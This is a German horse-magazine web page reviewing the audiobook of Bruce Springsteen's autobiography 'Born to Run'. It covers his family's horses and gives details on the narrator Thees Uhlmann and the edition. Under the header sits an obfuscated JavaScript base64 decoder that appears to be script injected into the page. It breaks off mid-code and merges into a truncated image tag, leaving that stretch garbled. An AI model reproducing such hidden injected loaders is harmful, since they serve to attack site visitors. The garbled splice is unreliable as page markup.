“Der Boss” und seine Pferde als Audio-Book

12. Dezember 2016 | Von Redaktion | Kategorie: Audio-Tipp

function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandom-House-Audio_B-Springsteen_Born-to-Run” src=”http://www.horse-today.de/wp-content/uploads/2016/10/Random-House-Audio_B-Springsteen_Born-to-Run-287x300.jpg" alt="Random-House-Audio_B-Springsteen_Born-to-Run" width="287" height="300" />Selten zuvor hat ein Bühnenkünstler seine eigene Geschichte mit solch einer Kraft und solch einem lodernden Feuer niedergeschrieben. Wie viele seiner Songs (Thunder Road, Badlands, Darkness on the Edge of Town, The River, Born in the U.S.A., The Rising oder The Ghost of Tom Joad, um ein paar wenige zu erwähnen) ist Bruce Springsteens Autobiografie geprägt von der Lyrik eines einzigartigen Songwriters und der Weisheit eines Mannes, der ausgiebig über sein Leben nachgedacht hat.

Besonders interessant – vor allem für Pferdefreunde – sind jene Episoden im Leben des Sängers, in welchem „der Boss“ von seiner Beziehung zu den Pferden berichtet. Diese war nicht immer ganz unkompliziert – denn auch eine Rock-Legende muss schließlich erst durch die harte Schule des Reitunterrichts -, aber dennoch verbindet ihn viel mit diesen Tieren. Seine Frau Patti Scialtia, mit der er seit 25 Jahren verheiratet ist, und seine Tochter Jessica, eine inzwischen international erfolgreiche Springreiterin, sind beide vom Pferdevirus befallen. In der Nähe seiner einstigen Heimatstadt erwarb die Familie vor einiger Zeit eine große Ranch, auf der inzwischen zahlreiche Pferde leben. Kleine Anekdoten rund um die ersten Anfänge im Sattel bis hin zu seinen Einsätzen als sogenannter „Turniertrottel“ (= Turnierbegleitung für die Tochter) ergänzen seine Ausführungen – und versetzen pferdebegeisterte Zuhörer dieses Audio-Books immer wieder ins Schmunzeln.

Der Autor:

Bruce Springsteen wurde in die Rock and Roll Hall of Fame, die Songwriters Hall of Fame und die New Jersey Hall of Fame aufgenommen. Er wurde mit 20 Grammy Awards, dem Academy Award und den Kennedy Center Honors ausgezeichnet. Springsteen lebt mit seiner Familie in New Jersey.

Der Sprecher:

Thees Uhlmann, geboren 1974 in Hemmoor, ist Musiker und Autor. Nach fünf Alben mit seiner Band Tomte stieg sein jüngstes Solo-Album 2013 auf Platz zwei in die deutschen Albumcharts ein. Sein Debütroman Sophia, der Tod und ich, laut der Frankfurter Allgemeinen Sonntagszeitung „witzig, berührend, mitunter erhellend”, landete auf Platz neun der Spiegel-Bestseller-Liste. Uhlmann lebt mit seiner Tochter in Berlin und betreibt das Independent Plattenlabel Grand Hotel van Cleef.

Bibliographie:

Bruce Springsteen
Born to Run
Die Autobiografie

Ungekürzte Lesung
Gelesen von Thees Uhlmann
Originaltitel: Born to run (Simon & Schuster)
Originalverlag: Heyne HC
Aus dem Amerikanischen von Teja Schwaner, Alexander Wagner, Urban Hofstetter
3 Hörbuch MP3-CDs,
Laufzeit: ca. 1073 Minuten
ISBN: 978-3-8371-3671-5
€ 27,99 [D] * | € 31,40 [A] * | CHF 38,90* (* empf. VK-Preis)
Verlag: Random House Audio

Tags: , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=139999

Hier klicken, um einen Kommentar zu schreiben